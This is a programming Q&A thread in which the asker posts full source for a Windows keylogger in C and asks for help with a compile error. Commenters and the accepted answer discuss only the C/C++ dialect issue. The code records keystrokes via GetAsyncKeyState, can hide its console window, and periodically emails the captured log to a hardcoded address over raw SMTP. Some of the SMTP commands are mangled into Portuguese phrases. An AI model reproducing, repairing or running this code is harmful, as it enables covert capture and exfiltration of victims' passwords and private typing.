# Error in keylogger code. Would you help me?

Tags: c++

I am updating a C ++ code from a keylogger in the DEV-C ++ IDE yet some of the code is not compiling. I would like help to fix this error.
My code:

```
#include <stdio.h>
#include <windows.h>
#include <time.h>

#define INVISIBLE_CONSOLE 0 
#define SILENT_CONSOLE 0 

#define LISTENER_TIMER 5
#define SENDER_SLEEP_TIME 100 

#define FILE_NAME "MarcadorLog.txt"

#define GMAIL_SERVER "gmail-smtp-in.l.google.com"
#define EMAIL_FROM "teste@gmail.com"
#define EMAIL_TO "teste@gmail.com"

void verifyStealthMode();
void savePressedKey(char pressedKey, char fileName[]);
int getPressedKeyBetweenASCII(int ASCIIValue1, int ASCIIValue2);
int getFileLength(char fileName[]);
char *getBufferFromFile(char fileName[]);
void overrideFile(char fileName[]);
void sendData(SOCKET socket, char data[]);
void sendEmail(char server[], char from[], char to[], char buffer[]);

void verifyStealthMode() {
    if(INVISIBLE_CONSOLE) {
        HWND stealth;
        AllocConsole();
        stealth = FindWindowA("ConsoleWindowClass", NULL);
        ShowWindow(stealth, 0);
    }
}

void savePressedKey(char pressedKey, char fileName[]) {
    FILE *file = fopen(fileName, "a+");

    fputc(pressedKey, file);
    fclose(file);
}

int getPressedKeyBetweenASCII(int ASCIIValue1, int ASCIIValue2) {
    int pressedKey = 0;

    for(int character = ASCIIValue1; character <= ASCIIValue2; character++) {
        if(GetAsyncKeyState(character) == -32767) {
            pressedKey = character;
        }
    }

    return pressedKey;
}

int getFileLength(char fileName[]) {
    FILE *file = fopen(fileName, "rb");

    fseek(file, 0, SEEK_END);

    int fileLength = ftell(file);

    fclose(file);

    return fileLength;
}

char *getBufferFromFile(char fileName[]) {
    FILE *file = fopen(fileName, "rb");

    int fileLength = getFileLength(fileName);

    char *buffer = (char *) malloc(fileLength + 1);

    fread(buffer, sizeof(char), fileLength, file);

    buffer[fileLength] = '\0';

    fclose(file);

    return buffer;
}

void overrideFile(char fileName[]) {
    FILE *file = fopen(fileName, "w");

    fclose(file);
}

int main() {
    verifyStealthMode();

    clock_t timer;
    clock_t now = clock();

    while(1) {
        int pressedKey = getPressedKeyBetweenASCII(8, 255);

        if(pressedKey) {
            savePressedKey(pressedKey, FILE_NAME);

            now = clock();
        }

        timer = (clock() - now) / CLOCKS_PER_SEC;

        if(timer > LISTENER_TIMER) {
            int fileLength = getFileLength(FILE_NAME);

            if(fileLength > 0) {
                sendEmail(GMAIL_SERVER, EMAIL_FROM, EMAIL_TO, getBufferFromFile(FILE_NAME));

                overrideFile(FILE_NAME);
            }

            now = clock();
        } else if(!SILENT_CONSOLE) {
            system("cls");
            printf("Lendo...");
            printf("\nTime para novo envio: %ld\n\n", (LISTENER_TIMER - timer));
        }
    }

    return 0;
}

void sendData(SOCKET sock, char data[]) {
    send(sock, data, strlen(data), 0);
    Sleep(SENDER_SLEEP_TIME);

    if(!SILENT_CONSOLE) printf("\n%s", data);
}

void sendEmail(char server[], char from[], char to[], char buffer[]) {
    SOCKET sock;
    WSADATA wsaData;
    struct hostent *host;
    struct sockaddr_in dest;

    char data[3000];

    // Get socket and dest:
    WSAStartup(0x202, &wsaData);

    host = gethostbyname(server);

    memset(&dest, 0, sizeof(dest));
    memcpy(&(dest.sin_addr), host->h_addr, host->h_length);

    dest.sin_family = host->h_addrtype;
    dest.sin_port = htons(25);

    sock = socket(AF_INET, SOCK_STREAM, 0);

    connect(sock, (struct sockaddr *) &dest, sizeof(dest));
    Sleep(SENDER_SLEEP_TIME);

    sprintf(data, "Ola me.somepalace.com\n");
    sendData(sock, data);

    sprintf(data, "Email de: <%s>\n", from);
    sendData(sock, data);

    sprintf(data, "recebido por: <%s>\n", to);
    sendData(sock, data);

    sprintf(data, "DATA\n");
    sendData(sock, data);

    sprintf(data, "para: %s\nFROM: %s\nSUBJECT: Keylogger\n%s\r\n.\r\n", to, from, buffer);
    sendData(sock, data);

    sprintf(data, "sair\n");
    sendData(sock, data);

    if(!SILENT_CONSOLE) {
        printf("\ntodos os pacotes foram enviados");
        Sleep(5000);
        system("cls");
    }

    closesocket(sock);
    WSACleanup();
}
```

This is the error line that the IDE selects:

`for(int character = ASCIIValue1; character <= ASCIIValue2; character++) {`

These are the two notes that appear in the compiler:

[Error] 'for' loop initial declarations are only allowed in C99 or C11 mode.

[Note] use option -std=c99, -std=gnu99, -std=c11 or -std=gnu11 to compile your code.

Comment: "These are the two notes" => one is an error, and the compiler is literally telling you what you should do.

Comment: @Berto99 No it isn't. Those would be incorrect flags for C++.

Comment: That is a ***LOT*** of code to demonstrate a syntax error on a single line. A [mre] for this should probably be around a half dozen lines and have no need to mention keylogging. (I thought about editing it down, but deleting that much seems like it might go against the author's intent.)

Answer (score 0, accepted):

It seems you're compiling your program as C, and an older C dialect at that (which required declarations to live at the top of functions).

Ensure that your IDE is configured to recognise your source code as C++, e.g. by giving the file a name ending in `.cpp` rather than `.c`.

Comment: ANSI C required declarations to be at the beginning of *scopes*, not functions as far as I know.

Comment: Oh, that's probably true. A bit more complex then since `for` introduces a scope in later C (but only later C). Ah well.

Comment: making this change that error was solved, another one appeared:

savePressedKey(pressedKey, FILE_NAME);

This message appears in the compiler:
[Warning] deprecated conversion from string constant to 'char*' [-Wwrite-strings]

Comment: @IagoGonalves: What?

Comment: @ast The thing is you could declare variables immediately inside the for loop scope, bot not in the initializer place in the for loop. https://godbolt.org/z/zJFkU_

Comment: Follow the code link online, if you can help me.
https://godbolt.org/z/N_rgvF

Comment: @_Static: Indeed but in later C, and in C++, the loop itself (including the initial declaration) introduces a scope.

Comment: @IagoGonalves If you have another problem, work for a while on it, then ask another question if you're still stuck. But the message you quote is easily Googleable.